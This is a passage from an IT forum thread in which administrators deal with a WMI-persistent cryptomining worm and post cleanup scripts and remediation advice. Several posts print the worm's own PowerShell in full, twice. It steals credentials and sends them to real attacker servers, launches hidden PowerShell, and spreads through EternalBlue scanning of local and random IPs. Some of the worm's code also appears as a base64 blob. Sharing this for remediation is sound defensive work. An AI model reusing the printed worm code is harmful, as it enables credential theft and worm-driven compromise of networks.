AAkAGkAcAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgAgAH0ADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgAzADIAXwBTAGUAcgB2AGkAYwBlAHMAJwApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFMAZQB0AFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAKAAnAGkAcABzAHUAJwAgACwAJABpAHAAcwB1ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFMAZQB0AFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAKAAnAGkAMQA3ACcAIAAsACQAaQAxADcAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBQAHUAdAAoACkADQAKAA0ACgAkAHQAPQB0AGUAcwB0AC0AYwBvAG4AbgBlAGMAdABpAG8AbgAgADkALgA5AC4AOQAuADkAIAAtAFYAZQByAGIAbwBzAGUAIAAtAEMAbwB1AG4AdAAgADIADQAKAGkAZgAoACQAdAApAHsADQAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4ATQB1AHQAZQB4AF0AJAB0AGgAcgBlAGEAZABfAG0AdQB0AGUAeAA7AA0ACgAJAFsAYgBvAG8AbABdACQAcgBlAHMAdQBsAHQAIAA9ACAAJABmAGEAbABzAGUAOwANAAoACQAkAHQAaAByAGUAYQBkAF8AbQB1AHQAZQB4ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4ATQB1AHQAZQB4ACgAJAB0AHIAdQBlACwAIAAiAE0ATQBMAE8ATABTAGEAYwBuAG4AZQByACIALAAgAFsAcgBlAGYAXQAgACQAcgBlAHMAdQBsAHQAKQA7AA0ACgAJAGkAZgAoACEAJAByAGUAcwB1AGwAdAApAHsADQAKAAkACQBlAHgAaQB0ADsADQAKAAkAfQANAAoACQB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQB7AA0ACgAJAAkAJABpAHAAPQBbAEkAUABBAGQAZAByAGUAcwBzAF0AOgA6AFAAYQByAHMAZQAoAFsAUwB0AHIAaQBuAGcAXQAgACgARwBlAHQALQBSAGEAbgBkAG8AbQApACkALgBJAFAAQQBkAGQAcgBlAHMAcwBUAG8AUwB0AHIAaQBuAGcADQAKAAkACQAkAHYAdQBsAD0AWwBQAGkAbgBnAEMAYQBzAHQAbABlAC4AUwBjAGEAbgBuAGUAcgBzAC4AbQAxADcAcwBjAF0AOgA6AFMAYwBhAG4AKAAkAGkAcAApAA0ACgAJAAkAaQBmACAAKAAkAHYAdQBsACkADQAKAAkACQB7AA0ACgAJAAkACQAkAHIAZQBzACAAPQAgAGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkAaQBmACAAKAAkAHIAZQBzACAALQBuAGUAIAAkAHQAcgB1AGUAKQANAAoACQAJAAkAewANAAoACQAJAAkACQBlAGIAOAAgACQAaQBwACAAJABzAGMADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANQANAAoACQB9AA0ACgB9AA==
    			CreateNewConsole: Falso
    			CreateNewProcessGroup: Falso
    			CreateSeparateWowVdm: Falso
    			CreateSharedWowVdm: Falso
    			CreatorSID[0]: 1
    			CreatorSID[1]: 5
    			CreatorSID[2]: 0
    			CreatorSID[3]: 0
    			CreatorSID[4]: 0
    			CreatorSID[5]: 0
    			CreatorSID[6]: 0
    			CreatorSID[7]: 5
    			CreatorSID[8]: 21
    			CreatorSID[9]: 0
    			CreatorSID[10]: 0
    			CreatorSID[11]: 0
    			CreatorSID[12]: 177
    			CreatorSID[13]: 162
    			CreatorSID[14]: 229
    			CreatorSID[15]: 162
    			CreatorSID[16]: 13
    			CreatorSID[17]: 5
    			CreatorSID[18]: 154
    			CreatorSID[19]: 92
    			CreatorSID[20]: 248
    			CreatorSID[21]: 81
    			CreatorSID[22]: 114
    			CreatorSID[23]: 38
    			CreatorSID[24]: 160
    			CreatorSID[25]: 4
    			CreatorSID[26]: 0
    			CreatorSID[27]: 0
    			DesktopName: 
    			ExecutablePath: 
    			FillAttribute: 
    			ForceOffFeedback: Falso
    			ForceOnFeedback: Falso
    			KillTimeout: 0
    			MachineName: 
    			MaximumQueueSize: 
    			Name: DSM Event Log Consumer
    			Priority: 32
    			RunInteractively: Falso
    			ShowWindowCommand: 
    			UseDefaultErrorMode: Falso
    			WindowTitle: 
    			WorkingDirectory: 
    			XCoordinate: 
    			XNumCharacters: 
    			XSize: 
    			YCoordinate: 
    			YNumCharacters: 
    			YSize: 
    			__PATH: \\SERV-MME-AIRES\ROOT\subscription:CommandLineEventConsumer.Name="DSM Event Log Consumer"
    			__NAMESPACE: ROOT\subscription
    			__SERVER: SERV-MME-AIRES
    			__DERIVATION[0]: __EventConsumer
    			__DERIVATION[1]: __IndicationRelated
    			__DERIVATION[2]: __SystemClass
    			__PROPERTY_COUNT: 27
    			__RELPATH: CommandLineEventConsumer.Name="DSM Event Log Consumer"
    			__DYNASTY: __SystemClass
    			__SUPERCLASS: __EventConsumer
    			__CLASS: CommandLineEventConsumer
    			__GENUS: 2
    NameSpace(2): root\subscription
    	Class: __EventFilter
    		Instance: __EventFilter.Name="DSM Event Log Filter"
    			CreatorSID[0]: 1
    			CreatorSID[1]: 5
    			CreatorSID[2]: 0
    			CreatorSID[3]: 0
    			CreatorSID[4]: 0
    			CreatorSID[5]: 0
    			CreatorSID[6]: 0
    			CreatorSID[7]: 5
    			CreatorSID[8]: 21
    			CreatorSID[9]: 0
    			CreatorSID[10]: 0
    			CreatorSID[11]: 0
    			CreatorSID[12]: 177
    			CreatorSID[13]: 162
    			CreatorSID[14]: 229
    			CreatorSID[15]: 162
    			CreatorSID[16]: 13
    			CreatorSID[17]: 5
    			CreatorSID[18]: 154
    			CreatorSID[19]: 92
    			CreatorSID[20]: 248
    			CreatorSID[21]: 81
    			CreatorSID[22]: 114
    			CreatorSID[23]: 38
    			CreatorSID[24]: 160
    			CreatorSID[25]: 4
    			CreatorSID[26]: 0
    			CreatorSID[27]: 0
    			EventAccess: 
    			EventNamespace: root\cimv2
    			Name: DSM Event Log Filter
    If log is empty, no bad scripts were found.
    

    Can somebody help me! please


    Wednesday, February 07, 2018 3:55 PM
  • I had problems with the powershell so in the end I created the below script to run on machines in a text file. Its not the prettiest but I had hundreds of devices hit and still tidying up now! But it worked for me.

    Some problem is that even though some servers say no logs found we still see the powershell trying to run. At the moment we have forced powershell command block using are AV so we see the alerts.

    ****************

    @echo on
    SetLocal EnableDelayedExpansion
    for /F %%a in (C:\machines.txt) do (
       echo Processing %%a
       ping %%a -n 2 | find /i "bytes="
       if !ErrorLevel! EQU 0 (
    psexec \\%%a -s cmd /c MKDIR c:\Help
    psexec \\%%a -s cmd /c xcopy \\SERVERSHARE\Help\*.* c:\Help /CY
    psexec \\%%a -s cmd /c winmgmt /backup "C:\Help\WMIBACKUP.data"
    psexec \\%%a -s cmd /c c:\help\CheckMalware.bat
    psexec \\%%a -s cmd /c WMIC /NAMESPACE:\\root\subscription PATH __EventFilter WHERE __CLASS="__EventFilter" DELETE
    psexec \\%%a -s cmd /c WMIC /NAMESPACE:\\root\subscription PATH __FilterToConsumerBinding WHERE __CLASS="__FilterToConsumerBinding" DELETE
    psexec \\%%a -s cmd /c WMIC /NAMESPACE:\\root\subscription PATH CommandLineEventConsumer WHERE __CLASS="CommandLineEventConsumer" DELETE
    psexec \\%%a -s cmd /c WMIC /NAMESPACE:\\root\subscription PATH NTEventLogEventConsumer WHERE __CLASS="NTEventLogEventConsumer" DELETE
    psexec \\%%a -s cmd /c WMIC /NAMESPACE:\\root\DEFAULT CLASS "Office_Updater" DELETE
    psexec \\%%a -s cmd /c c:\help\CheckClear.bat
       ) else (
          echo %%a does not respond
       )
    )

    *********************

    The CheckMalware.bat is just:

    cscript //nologo C:\help\WMILister_20.vbs > \\SERVERNAME\Help\Scans\%computername%-before.txt
    exit /B 0

    and the CheckClear.bat is just;

    cscript //nologo C:\help\WMILister_20.vbs > \\SERVERNAME\Help\Scans\%computername%-after.txt
    exit /B 0

    In \\SERVERNAME\Help\ is;

    CheckClear.bat

    CheckMalware.bat

    WMILister_20.vbs


    Dean White

    Wednesday, February 07, 2018 4:06 PM
  • This is WannaScan.A. Or Lonit.PA or anyone of a number of other names (they are all a part of the WannaMine family). It is a Powershell exploit coming out of Russia for data mining bit coins. It resides in memory so traditional anti-virus is not able to deal with it (there is no artifact to delete). Endpoint Protection/Windows Defender sees and reports it but cannot mitigate it because the physical file only lasts a fraction of a second before it uploads to memory (and deletes the physical file). The high CPU relates to the mining and to it using Internal Blue (SMB v1 exploit) to search for other domain assets.
    • Edited by PSDaan Wednesday, February 21, 2018 4:24 PM New info
    Friday, February 09, 2018 1:57 PM
  • I'm having the same problem with my company. The problem is that the antivirus has not detected. We blocked the execution of powershell by GPO, but it still runs.

    How can we block this?

    The only way I got it was by renaming it (powershell.exe).

    Thank you.
    Friday, February 09, 2018 11:11 PM
  • Looks like you ran an older tool from ESET's forums.  That tool has been updated to give the commands you need to remediate the issue.  See this forum thread:

    https://forum.eset.com/topic/14650-malware/?tab=comments#comment-72807

    I would recommend posting on that forum as well.  It appears JamesR is assisting people there with remediation.

    In short, you have been hit by a WMI Persistent CoinMiner that can spread across your network.  This is a Worm which can use both EternalBlue or WMI to spread across your network.  Because of the ability to spread across a network, it could be very painful to get full remediation done.  Likely infection vectors could be:

    1. To many ports open to the internet (ports 135 through 139 and port 445) allowing the infection to walk right on in.
    2. Possible RDP Brute Force on server succeeded and worm was placed by malicious actor using administrative credentials.  If you allow RDP from the outside world, you should lock this down to only allow specific IP Addresses.  Also implement a lockout policy for when to many consecutive bad passwords have been supplied by a user.  Lastly, implement 2FA to prevent a leaked password from being used.
    3. If continually reinfected after cleanup, there is another computer on your network which is spreading the infection.

    Wednesday, February 14, 2018 3:58 PM
  • I had the same issue before. I created a powershell script to get rid of this malware:

    foreach($ip in Get-Content .\serverlist.txt) {
     #save all target IP in serverlist.txt
     Write-Output “===================================”
     Write-Output “Processing $ip …”
     Write-Output “===================================”
     
     #these lines are used to kill malicious process which can be identified by their command line or path
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%default:Win32_Services%’” CALL TERMINATE
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%info6.ps1%’” CALL TERMINATE
     wmic /node:$ip process WHERE “ExecutablePath=’C:\\ProgramData\\UpdateService\\UpdateService.exe’” CALL TERMINATE
     wmic /node:$ip process WHERE “ExecutablePath=’C:\\ProgramData\\AppCache\\17_\\java.exe’” CALL TERMINATE
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAG%’” CALL TERMINATE
    #change “Win32_Services” and “DSM Event” to match evil class and instance name found in your environment
     wmic /node:$ip /NAMESPACE:”\\root\default” PATH Win32_Services DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH __EventFilter WHERE “Name LIKE ‘DSM Event%’” DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH CommandLineEventConsumer WHERE “Name LIKE ‘DSM Event%’” DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH __FilterToConsumerBinding WHERE “Filter=””__EventFilter.Name=’DSM Event Log Filter’””” DELETE
    }

    The class name, filename or variables used in your environment might be different. Just modify the script. If you need more information, check out my article on medium

    https://medium.com/@christoferdirk/cryptomining-malware-is-using-wmi-to-evade-antivirus-detection-248a91a620b9

    Wednesday, March 28, 2018 12:46 PM
  • I had the same issue before. I created a powershell script to get rid of this malware:

    foreach($ip in Get-Content .\serverlist.txt) {
     #save all target IP in serverlist.txt
     Write-Output “===================================”
     Write-Output “Processing $ip …”
     Write-Output “===================================”
     
     #these lines are used to kill malicious process which can be identified by their command line or path
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%default:Win32_Services%’” CALL TERMINATE
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%info6.ps1%’” CALL TERMINATE
     wmic /node:$ip process WHERE “ExecutablePath=’C:\\ProgramData\\UpdateService\\UpdateService.exe’” CALL TERMINATE
     wmic /node:$ip process WHERE “ExecutablePath=’C:\\ProgramData\\AppCache\\17_\\java.exe’” CALL TERMINATE
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAG%’” CALL TERMINATE
    #change “Win32_Services” and “DSM Event” to match evil class and instance name found in your environment
     wmic /node:$ip /NAMESPACE:”\\root\default” PATH Win32_Services DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH __EventFilter WHERE “Name LIKE ‘DSM Event%’” DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH CommandLineEventConsumer WHERE “Name LIKE ‘DSM Event%’” DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH __FilterToConsumerBinding WHERE “Filter=””__EventFilter.Name=’DSM Event Log Filter’””” DELETE
    }

    The class name, filename or variables used in your environment might be different. Just modify the script. If you need more information, check out my article on medium

    https://medium.com/@christoferdirk/cryptomining-malware-is-using-wmi-to-evade-antivirus-detection-248a91a620b9

    I'll check it out.

    I just wanted to identify the computer that is infected.
    Friday, March 30, 2018 11:40 AM
  • I had the same issue before. I created a powershell script to get rid of this malware:

    foreach($ip in Get-Content .\serverlist.txt) {
     #save all target IP in serverlist.txt
     Write-Output “===================================”
     Write-Output “Processing $ip …”
     Write-Output “===================================”
     
     #these lines are used to kill malicious process which can be identified by their command line or path
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%default:Win32_Services%’” CALL TERMINATE
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%info6.ps1%’” CALL TERMINATE
     wmic /node:$ip process WHERE “ExecutablePath=’C:\\ProgramData\\UpdateService\\UpdateService.exe’” CALL TERMINATE
     wmic /node:$ip process WHERE “ExecutablePath=’C:\\ProgramData\\AppCache\\17_\\java.exe’” CALL TERMINATE
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAG%’” CALL TERMINATE
    #change “Win32_Services” and “DSM Event” to match evil class and instance name found in your environment
     wmic /node:$ip /NAMESPACE:”\\root\default” PATH Win32_Services DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH __EventFilter WHERE “Name LIKE ‘DSM Event%’” DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH CommandLineEventConsumer WHERE “Name LIKE ‘DSM Event%’” DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH __FilterToConsumerBinding WHERE “Filter=””__EventFilter.Name=’DSM Event Log Filter’””” DELETE
    }

    The class name, filename or variables used in your environment might be different. Just modify the script. If you need more information, check out my article on medium

    https://medium.com/@christoferdirk/cryptomining-malware-is-using-wmi-to-evade-antivirus-detection-248a91a620b9

    I'll check it out.

    I just wanted to identify the computer that is infected.
    $stime=[Environment]::TickCount
    $funs = ([WmiClass] 'root\default:Win32_Services').Properties['funs'].Value
    $defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
    iex $defun

    Get-WmiObject _FilterToConsumerBinding -Namespace root\subscription | Where-Object {$.filter -notmatch 'DSM Event'} |Remove-WmiObject
    $dirpath=$env:SystemRoot+'\system32'
    if  (!(test-path $dirpath )){
            $dirpath=$env:SystemRoot
    }
    if (!(test-path ($dirpath+'\msvcp120.dll')))
    {sentfile ($dirpath+'\msvcp120.dll') 'vcp'}
    if (!(test-path ($dirpath+'\msvcr120.dll')))
    {sentfile ($dirpath+'\msvcr120.dll') 'vcr'}

    [array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
    $tcpconn = netstat -anop tcp
    $exist=$False
    if ($psids -ne $null )
    {
        foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if ($line -eq $null)
            {continue}
            if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) )
            {
                $exist=$true
                break
            }
        }
    }
    foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if (!($line -is [array])){continue}
            if (($line[-3].contains(":3333") -or $line[-3].contains(":5555")-or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
            {
                $evid=$line[-1]
                Get-Process -id $evid | stop-process -force
            }
        }
    if (!$exist -and ($psids.count -le 8))
    {
        $cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:Win32_Services').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:Win32_Services').Proper
    ties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon
    , `$mon, 'Void', 0, '', '')`""
        $vbs = New-Object -ComObject WScript.Shell
        $vbs.run($cmdmon,0)
    }

    $NTLM=$False
    $mimi = ([WmiClass] 'root\default:Win32_Services').Properties['mimi'].Value
    $a, $NTLM= Get-creds $mimi $mimi
    $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled}
    $ipsu = ([WmiClass] 'root\default:Win32_Services').Properties['ipsu'].Value
    $i17 = ([WmiClass] 'root\default:Win32_Services').Properties['i17'].Value
    $scba= ([WmiClass] 'root\default:Win32_Services').Properties['sc'].Value
    [byte[]]$sc=[System.Convert]::FromBase64String($scba)

    $se=@('195.22.127.157', 'node.jhshxbv.com', 'node2.jhshxbv.com', 'node3.jhshxbv.com', 'node4.jhshxbv.com')
    $nic='195.22.127.157'
    foreach($t in $se)
    {
            $pin=test-connection $t
            if ($pin -ne $null)
            {
                    $nic=$t
                    break
            }
    }
    $nic=$nic+":8000"
    if ($a.count -ne 0)
    {
    foreach($aa in $a){
    $data = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aa))
    (New-Object Net.WebClient).DownloadString("http://$nic/api.php?data=" + $data)
    }
    }
    foreach ($Network in $Networks)
    {

        $IPAddress  = $Network.IpAddress[0]
        if ($IPAddress -match '^169.254')
        {
            continue
        }
        $SubnetMask  = $Network.IPSubnet[0]
        $ips=Get-NetworkRange $IPAddress $SubnetMask
        $tcpconn = netstat -anop tcp
        foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if (!($line -is [array])){
                continue
            }
            if ($line.count -le 4){
                continue
            }
            $i=$line[-3].split(':')[0]
            if (($line[-2] -eq 'ESTABLISHED') -and  ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
            {
                $ips+=$i
            }
        }
        if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
        foreach ($ip in $ips)
        {
            if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
            if ($ip -eq $IPAddress){continue}
            if ((Test-Connection $ip -count 1) -ne $null  -and $ipsu -notcontains $ip)
            {
                $re=0
                if ($a.count -ne 0)
                {
                    $re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM
                }
                if ($re -eq 1)
                {
                    $ipsu = $ipsu + " " + $ip
                }
                else
                {
                    $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
                    if ($vul -and $i17 -notcontains $ip)
                    {
                        $res = eb7 $ip $sc
                        if ($res -ne $true)
                        {
                            eb8 $ip $sc
                        }
                        $i17 = $i17 + " " + $ip
                    }
                }
            }
        }
     }
    $StaticClass=New-Object Management.ManagementClass('root\default:Win32_Services')
    $StaticClass.SetPropertyValue('ipsu' ,$ipsu)
    $StaticClass.Put()
    $StaticClass.SetPropertyValue('i17' ,$i17)
    $StaticClass.Put()

    $t=test-connection 9.9.9.9 -Verbose -Count 2
    if($t){
        [System.Threading.Mutex]$thread_mutex;
    [bool]$result = $false;
    $thread_mutex = New-Object System.Threading.Mutex($true, "MMLOLSacnner", [ref] $result);
    if(!$result){
    exit;
    }
    while($true){
    $ip=[IPAddress]::Parse([String] (Get-Random)).IPAddressToString
    $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
    if ($vul)
    {
    $res = eb7 $ip $sc
    if ($res -ne $true)
    {
    eb8 $ip $sc
    }
    }
    Start-Sleep 5
    }
    }
    Friday, March 30, 2018 11:58 AM
  • I had the same issue before. I created a powershell script to get rid of this malware:

    foreach($ip in Get-Content .\serverlist.txt) {
     #save all target IP in serverlist.txt
     Write-Output “===================================”
     Write-Output “Processing $ip …”
     Write-Output “===================================”
     
     #these lines are used to kill malicious process which can be identified by their command line or path
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%default:Win32_Services%’” CALL TERMINATE
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%info6.ps1%’” CALL TERMINATE
     wmic /node:$ip process WHERE “ExecutablePath=’C:\\ProgramData\\UpdateService\\UpdateService.exe’” CALL TERMINATE
     wmic /node:$ip process WHERE “ExecutablePath=’C:\\ProgramData\\AppCache\\17_\\java.exe’” CALL TERMINATE
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAG%’” CALL TERMINATE
    #change “Win32_Services” and “DSM Event” to match evil class and instance name found in your environment
     wmic /node:$ip /NAMESPACE:”\\root\default” PATH Win32_Services DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH __EventFilter WHERE “Name LIKE ‘DSM Event%’” DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH CommandLineEventConsumer WHERE “Name LIKE ‘DSM Event%’” DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH __FilterToConsumerBinding WHERE “Filter=””__EventFilter.Name=’DSM Event Log Filter’””” DELETE
    }

    The class name, filename or variables used in your environment might be different. Just modify the script. If you need more information, check out my article on medium

    https://medium.com/@christoferdirk/cryptomining-malware-is-using-wmi-to-evade-antivirus-detection-248a91a620b9

    I'll check it out.

    I just wanted to identify the computer that is infected.

    $stime=[Environment]::TickCount
    $funs = ([WmiClass] 'root\default:Win32_Services').Properties['funs'].Value
    $defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
    iex $defun

    Get-WmiObject _FilterToConsumerBinding -Namespace root\subscription | Where-Object {$.filter -notmatch 'DSM Event'} |Remove-WmiObject
    $dirpath=$env:SystemRoot+'\system32'
    if  (!(test-path $dirpath )){
            $dirpath=$env:SystemRoot
    }
    if (!(test-path ($dirpath+'\msvcp120.dll')))
    {sentfile ($dirpath+'\msvcp120.dll') 'vcp'}
    if (!(test-path ($dirpath+'\msvcr120.dll')))
    {sentfile ($dirpath+'\msvcr120.dll') 'vcr'}

    [array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
    $tcpconn = netstat -anop tcp
    $exist=$False
    if ($psids -ne $null )
    {
        foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if ($line -eq $null)
            {continue}
            if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) )
            {
                $exist=$true
                break
            }
        }
    }
    foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if (!($line -is [array])){continue}
            if (($line[-3].contains(":3333") -or $line[-3].contains(":5555")-or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
            {
                $evid=$line[-1]
                Get-Process -id $evid | stop-process -force
            }
        }
    if (!$exist -and ($psids.count -le 8))
    {
        $cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:Win32_Services').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:Win32_Services').Proper
    ties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon
    , `$mon, 'Void', 0, '', '')`""
        $vbs = New-Object -ComObject WScript.Shell
        $vbs.run($cmdmon,0)
    }

    $NTLM=$False
    $mimi = ([WmiClass] 'root\default:Win32_Services').Properties['mimi'].Value
    $a, $NTLM= Get-creds $mimi $mimi
    $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled}
    $ipsu = ([WmiClass] 'root\default:Win32_Services').Properties['ipsu'].Value
    $i17 = ([WmiClass] 'root\default:Win32_Services').Properties['i17'].Value
    $scba= ([WmiClass] 'root\default:Win32_Services').Properties['sc'].Value
    [byte[]]$sc=[System.Convert]::FromBase64String($scba)

    $se=@('195.22.127.157', 'node.jhshxbv.com', 'node2.jhshxbv.com', 'node3.jhshxbv.com', 'node4.jhshxbv.com')
    $nic='195.22.127.157'
    foreach($t in $se)
    {
            $pin=test-connection $t
            if ($pin -ne $null)
            {
                    $nic=$t
                    break
            }
    }
    $nic=$nic+":8000"
    if ($a.count -ne 0)
    {
    foreach($aa in $a){
    $data = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aa))
    (New-Object Net.WebClient).DownloadString("http://$nic/api.php?data=" + $data)
    }
    }
    foreach ($Network in $Networks)
    {

        $IPAddress  = $Network.IpAddress[0]
        if ($IPAddress -match '^169.254')
        {
            continue
        }
        $SubnetMask  = $Network.IPSubnet[0]
        $ips=Get-NetworkRange $IPAddress $SubnetMask
        $tcpconn = netstat -anop tcp
        foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if (!($line -is [array])){
                continue
            }
            if ($line.count -le 4){
                continue
            }
            $i=$line[-3].split(':')[0]
            if (($line[-2] -eq 'ESTABLISHED') -and  ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
            {
                $ips+=$i
            }
        }
        if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
        foreach ($ip in $ips)
        {
            if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
            if ($ip -eq $IPAddress){continue}
            if ((Test-Connection $ip -count 1) -ne $null  -and $ipsu -notcontains $ip)
            {
                $re=0
                if ($a.count -ne 0)
                {
                    $re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM
                }
                if ($re -eq 1)
                {
                    $ipsu = $ipsu + " " + $ip
                }
                else
                {
                    $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
                    if ($vul -and $i17 -notcontains $ip)
                    {
                        $res = eb7 $ip $sc
                        if ($res -ne $true)
                        {
                            eb8 $ip $sc
                        }
                        $i17 = $i17 + " " + $ip
                    }
                }
            }
        }
     }
    $StaticClass=New-Object Management.ManagementClass('root\default:Win32_Services')
    $StaticClass.SetPropertyValue('ipsu' ,$ipsu)
    $StaticClass.Put()
    $StaticClass.SetPropertyValue('i17' ,$i17)
    $StaticClass.Put()

    $t=test-connection 9.9.9.9 -Verbose -Count 2
    if($t){
        [System.Threading.Mutex]$thread_mutex;
    [bool]$result = $false;
    $thread_mutex = New-Object System.Threading.Mutex($true, "MMLOLSacnner", [ref] $result);
    if(!$result){
    exit;
    }
    while($true){
    $ip=[IPAddress]::Parse([String] (Get-Random)).IPAddressToString
    $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
    if ($vul)
    {
    $res = eb7 $ip $sc
    if ($res -ne $true)
    {
    eb8 $ip $sc
    }
    }
    Start-Sleep 5
    }
    }
    What should I tailor your script?
    Friday, March 30, 2018 11:59 AM
  • I had the same issue before. I created a powershell script to get rid of this malware:

    foreach($ip in Get-Content .\serverlist.txt) {
     #save all target IP in serverlist.txt
     Write-Output “===================================”
     Write-Output “Processing $ip …”
     Write-Output “===================================”
     
     #these lines are used to kill malicious process which can be identified by their command line or path
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%default:Win32_Services%’” CALL TERMINATE
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%info6.ps1%’” CALL TERMINATE
     wmic /node:$ip process WHERE “ExecutablePath=’C:\\ProgramData\\UpdateService\\UpdateService.exe’” CALL TERMINATE
     wmic /node:$ip process WHERE “ExecutablePath=’C:\\ProgramData\\AppCache\\17_\\java.exe’” CALL TERMINATE
     wmic /node:$ip process WHERE “COMMANDLINE LIKE ‘%JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAG%’” CALL TERMINATE
    #change “Win32_Services” and “DSM Event” to match evil class and instance name found in your environment
     wmic /node:$ip /NAMESPACE:”\\root\default” PATH Win32_Services DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH __EventFilter WHERE “Name LIKE ‘DSM Event%’” DELETE
     wmic /node:$ip /NAMESPACE:”\\root\subscription” PATH CommandLineEventConsumer WHERE “Name LIKE ‘DSM Event%’” DELETE
